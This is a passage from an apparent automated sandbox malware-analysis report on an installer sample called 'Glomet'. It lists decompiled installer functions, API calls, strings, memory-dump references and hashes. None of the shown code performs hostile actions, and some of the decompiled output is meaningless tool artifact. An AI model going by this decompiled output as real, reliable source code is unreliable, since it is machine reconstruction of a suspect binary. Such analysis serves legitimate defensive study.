                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                              • String ID: Calibri
                                                                                                                                                                              • API String ID: 3808545654-1409258342
                                                                                                                                                                              • Opcode ID: 9b11d4c019c816d20c1c21f539ca41ee850594db86684445f923bb2a1dbfe0ac
                                                                                                                                                                              • Instruction ID: 7d8b70fc9580f7c0a3656fe434d2777149f8876c9caaa3587920b0b4353cf884
                                                                                                                                                                              • Opcode Fuzzy Hash: 9b11d4c019c816d20c1c21f539ca41ee850594db86684445f923bb2a1dbfe0ac
                                                                                                                                                                              • Instruction Fuzzy Hash: 04019E72504240AFE7007BB0AF4AA9A7FF8EB55305F10847DF281B61F2CB7804888B6C
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00402E25 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00402E25(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41d440; // 0x52b4c
					_t11 =  *0x42944c; // 0x54a40
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                                                                                                              0x00402e32
                                                                                                                                                                              0x00402e40
                                                                                                                                                                              0x00402e46
                                                                                                                                                                              0x00402e46
                                                                                                                                                                              0x00402e54
                                                                                                                                                                              0x00402e56
                                                                                                                                                                              0x00402e5c
                                                                                                                                                                              0x00402e63
                                                                                                                                                                              0x00402e65
                                                                                                                                                                              0x00402e65
                                                                                                                                                                              0x00402e7b
                                                                                                                                                                              0x00402e8b
                                                                                                                                                                              0x00402e9d
                                                                                                                                                                              0x00402e9d
                                                                                                                                                                              0x00402ea5

                                                                                                                                                                              APIs
                                                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E40
                                                                                                                                                                              • MulDiv.KERNEL32(00052B4C,00000064,00054A40), ref: 00402E6B
                                                                                                                                                                              • wsprintfA.USER32 ref: 00402E7B
                                                                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00402E8B
                                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 00402E9D
                                                                                                                                                                              Strings
                                                                                                                                                                              • verifying installer: %d%%, xrefs: 00402E75
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                              • String ID: verifying installer: %d%%
                                                                                                                                                                              • API String ID: 1451636040-82062127
                                                                                                                                                                              • Opcode ID: eba7e3e6a7a9e8d042f95bb146de847513e93a7983d8e04ff54a2d99dc20c472
                                                                                                                                                                              • Instruction ID: 3badc6b09a90e5cd1525348ef4ea74cecb255546bda3c46a06932aa9f71b5be3
                                                                                                                                                                              • Opcode Fuzzy Hash: eba7e3e6a7a9e8d042f95bb146de847513e93a7983d8e04ff54a2d99dc20c472
                                                                                                                                                                              • Instruction Fuzzy Hash: 61016270640209FBEF209F60DE09EEE3769EB04344F008039FA06B51D0DBB89955CF59
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 004027E8 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                              			E004027E8(int __ebx) {
				CHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402C39(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x78) = _t26;
				if(E00405C56(_t26) == 0) {
					E00402C39(0xffffffed);
				}
				E00405DC5(_t55);
				_t29 = E00405DEA(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0xc) =  *(_t61 - 0x24);
					if( *(_t61 - 0x20) != _t49) {
						_t37 =  *0x42f434;
						 *(_t61 - 0x30) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E0040336B(_t49);
							E00403355(_t54,  *(_t61 - 0x30));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x20));
							 *(_t61 - 0x38) = _t59;
							if(_t59 != _t49) {
								E00403143( *(_t61 - 0x24), _t49, _t59,  *(_t61 - 0x20));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x8c) =  *_t59;
									E00405DA5( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x8c);
								}
								GlobalFree( *(_t61 - 0x38));
							}
							E00405E91( *(_t61 + 8), _t54,  *(_t61 - 0x30));
							GlobalFree(_t54);
							 *(_t61 - 0xc) =  *(_t61 - 0xc) | 0xffffffff;
						}
					}
					_t52 = E00403143( *(_t61 - 0xc),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileA( *(_t61 - 0x78));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                                                                                                                                              0x004027e8
                                                                                                                                                                              0x004027ea
                                                                                                                                                                              0x004027ef
                                                                                                                                                                              0x004027f4
                                                                                                                                                                              0x004027f7
                                                                                                                                                                              0x00402801
                                                                                                                                                                              0x00402805
                                                                                                                                                                              0x00402805
                                                                                                                                                                              0x0040280b
                                                                                                                                                                              0x00402818
                                                                                                                                                                              0x00402820
                                                                                                                                                                              0x00402823
                                                                                                                                                                              0x0040282f
                                                                                                                                                                              0x00402832
                                                                                                                                                                              0x00402838
                                                                                                                                                                              0x00402846
                                                                                                                                                                              0x0040284b
                                                                                                                                                                              0x0040284f
                                                                                                                                                                              0x00402852
                                                                                                                                                                              0x0040285b
                                                                                                                                                                              0x00402867
                                                                                                                                                                              0x0040286b
                                                                                                                                                                              0x0040286e
                                                                                                                                                                              0x00402878
                                                                                                                                                                              0x0040289d
                                                                                                                                                                              0x00402884
                                                                                                                                                                              0x0040288c
                                                                                                                                                                              0x00402892
                                                                                                                                                                              0x00402897
                                                                                                                                                                              0x00402897
                                                                                                                                                                              0x004028a4
                                                                                                                                                                              0x004028a4
                                                                                                                                                                              0x004028b1
                                                                                                                                                                              0x004028b7
                                                                                                                                                                              0x004028bd
                                                                                                                                                                              0x004028bd
                                                                                                                                                                              0x0040284f
                                                                                                                                                                              0x004028d1
                                                                                                                                                                              0x004028d3
                                                                                                                                                                              0x004028d3
                                                                                                                                                                              0x004028dd
                                                                                                                                                                              0x004028de
                                                                                                                                                                              0x004028e2
                                                                                                                                                                              0x004028e6
                                                                                                                                                                              0x004028ec
                                                                                                                                                                              0x004028ec
                                                                                                                                                                              0x004028f3
                                                                                                                                                                              0x004022e5
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00402ad4

                                                                                                                                                                              APIs
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402849
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402865
                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 004028A4
                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 004028B7
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028D3
                                                                                                                                                                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028E6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2667972263-0
                                                                                                                                                                              • Opcode ID: 9548857013987411b3f9cdcf6671ff403388a66a2a9ceece02722ea9efb0e8fb
                                                                                                                                                                              • Instruction ID: 8ee3283f5e82c4de6b5bb6756b1dc9e053edc2f3d39da16acebec05e3c4c8ed7
                                                                                                                                                                              • Opcode Fuzzy Hash: 9548857013987411b3f9cdcf6671ff403388a66a2a9ceece02722ea9efb0e8fb
                                                                                                                                                                              • Instruction Fuzzy Hash: 55318F32800124BBDF217FA5DE89D9E7B79BF08324F14423AF554B62D1CB7949419B68
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00404B1D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                                              			E00404B1D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E004062EA(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E004062EA(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E004062EA(_t41, _t47, 0x42a890, 0x42a890, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a890), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a890);
			}



















                                                                                                                                                                              0x00404b23
                                                                                                                                                                              0x00404b28
                                                                                                                                                                              0x00404b30
                                                                                                                                                                              0x00404b31
                                                                                                                                                                              0x00404b3e
                                                                                                                                                                              0x00404b46
                                                                                                                                                                              0x00404b47
                                                                                                                                                                              0x00404b49
                                                                                                                                                                              0x00404b4b
                                                                                                                                                                              0x00404b4d
                                                                                                                                                                              0x00404b50
                                                                                                                                                                              0x00404b50
                                                                                                                                                                              0x00404b57
                                                                                                                                                                              0x00404b5d
                                                                                                                                                                              0x00404b5d
                                                                                                                                                                              0x00404b64
                                                                                                                                                                              0x00404b6b
                                                                                                                                                                              0x00404b6e
                                                                                                                                                                              0x00404b71
                                                                                                                                                                              0x00404b71
                                                                                                                                                                              0x00404b75
                                                                                                                                                                              0x00404b85
                                                                                                                                                                              0x00404b87
                                                                                                                                                                              0x00404b8a
                                                                                                                                                                              0x00404b33
                                                                                                                                                                              0x00404b33
                                                                                                                                                                              0x00404b3a
                                                                                                                                                                              0x00404b3a
                                                                                                                                                                              0x00404b92
                                                                                                                                                                              0x00404b9d
                                                                                                                                                                              0x00404bb3
                                                                                                                                                                              0x00404bc3
                                                                                                                                                                              0x00404bdf

                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlenA.KERNEL32(ARBEJDSTILLADELSER Setup: Installing,ARBEJDSTILLADELSER Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A38,000000DF,00000000,00000400,?), ref: 00404BBB
                                                                                                                                                                              • wsprintfA.USER32 ref: 00404BC3
                                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 00404BD6
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                              • String ID: %u.%u%s%s$ARBEJDSTILLADELSER Setup: Installing
                                                                                                                                                                              • API String ID: 3540041739-135139484
                                                                                                                                                                              • Opcode ID: cb957fc4db8a1e40465dafa4ff9b9538edb65549acbd6bcc8d463070165e739e
                                                                                                                                                                              • Instruction ID: b26deece5e1670680048ef5420f4dfbdf719bfc276585dbcb3e162ecceacc2fc
                                                                                                                                                                              • Opcode Fuzzy Hash: cb957fc4db8a1e40465dafa4ff9b9538edb65549acbd6bcc8d463070165e739e
                                                                                                                                                                              • Instruction Fuzzy Hash: 8311B773A0412867DB00756D9C41FAF3698DB85374F25027BFA26F31D1E979DC1282AD
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00401D65 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                                              			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402C17(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402C39(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x42f420,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E004061B5();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                                                                                                                              0x00401d65
                                                                                                                                                                              0x00401d69
                                                                                                                                                                              0x00401d7e
                                                                                                                                                                              0x00401d6b
                                                                                                                                                                              0x00401d6d
                                                                                                                                                                              0x00401d73
                                                                                                                                                                              0x00401d73
                                                                                                                                                                              0x00401d84
                                                                                                                                                                              0x00401d87
                                                                                                                                                                              0x00401d91
                                                                                                                                                                              0x00401d94
                                                                                                                                                                              0x00401d9c
                                                                                                                                                                              0x00401dad
                                                                                                                                                                              0x00401db0
                                                                                                                                                                              0x00401dbb
                                                                                                                                                                              0x00401db2
                                                                                                                                                                              0x00401db4
                                                                                                                                                                              0x00401db4
                                                                                                                                                                              0x00401dbf
                                                                                                                                                                              0x00401dcc
                                                                                                                                                                              0x00401df3
                                                                                                                                                                              0x00401e02
                                                                                                                                                                              0x00401e10
                                                                                                                                                                              0x00401e18
                                                                                                                                                                              0x00401e20
                                                                                                                                                                              0x00401e20
                                                                                                                                                                              0x00401e29
                                                                                                                                                                              0x00401e2f
                                                                                                                                                                              0x00402a42
                                                                                                                                                                              0x00402a42
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00402ad4

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                                              • Opcode ID: aac179cc4a1ea37f398950429777a32d29ab910b0ca69bec431bc59fb76cd7ad
                                                                                                                                                                              • Instruction ID: 4973ce5daa8367ce9871db5c73950c0598185a6d8b35e77b8380d9c424f967d4
                                                                                                                                                                              • Opcode Fuzzy Hash: aac179cc4a1ea37f398950429777a32d29ab910b0ca69bec431bc59fb76cd7ad
                                                                                                                                                                              • Instruction Fuzzy Hash: E3213B72E00109AFDF15DFA4DD85AAEBBB5EB48300F24407EF901F62A0DB789941DB54
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowtimeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                              			E00401C1F(void* __eax, void* __ecx) {
				void* _t13;

				 *((intOrPtr*)(__ecx + 0x78358906)) =  *((intOrPtr*)(__ecx + 0x78358906)) + __ecx;
				_push(cs);
				 *0x97e90040 =  *0x97e90040 + 0x97e90040;
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}




                                                                                                                                                                              0x00401c20
                                                                                                                                                                              0x00401c2b
                                                                                                                                                                              0x00401c2c
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00402ad4

                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                                                                                                                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                                              • String ID: !
                                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                                              • Opcode ID: 7410f7b0bd0c18f2c64b82a674c0cf8743cbf67753a72bc4eeed8c085ede368e
                                                                                                                                                                              • Instruction ID: 6f3743f7751afa272f16232aa57a2a55c405f629e638bed5de0fb5cae73960b7
                                                                                                                                                                              • Opcode Fuzzy Hash: 7410f7b0bd0c18f2c64b82a674c0cf8743cbf67753a72bc4eeed8c085ede368e
                                                                                                                                                                              • Instruction Fuzzy Hash: 4A31A071948208BEEB059FB5DA86AAD7FB0EF84304F20447EF101F61D1D6B98981DB28
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00405BE9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00405BE9(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




                                                                                                                                                                              0x00405bea
                                                                                                                                                                              0x00405c01
                                                                                                                                                                              0x00405c09
                                                                                                                                                                              0x00405c09
                                                                                                                                                                              0x00405c11

                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 00405BEF
                                                                                                                                                                              • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 00405BF8
                                                                                                                                                                              • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405C09
                                                                                                                                                                              Strings
                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                              • API String ID: 2659869361-3916508600
                                                                                                                                                                              • Opcode ID: 78cba1d5cb2474798914f87c9b537ab1510ee16986e2efd06177e80df85e38b2
                                                                                                                                                                              • Instruction ID: 3e3e415651ec8bc6573efeb1b95b99caa1af1f852236f091574545f75c3ac81b
                                                                                                                                                                              • Opcode Fuzzy Hash: 78cba1d5cb2474798914f87c9b537ab1510ee16986e2efd06177e80df85e38b2
                                                                                                                                                                              • Instruction Fuzzy Hash: 15D02362609634BBE20137154D05EDF194C8F0335070504BBF100B31A1C77C4C1147FD
                                                                                                                                                                              Uniqueness

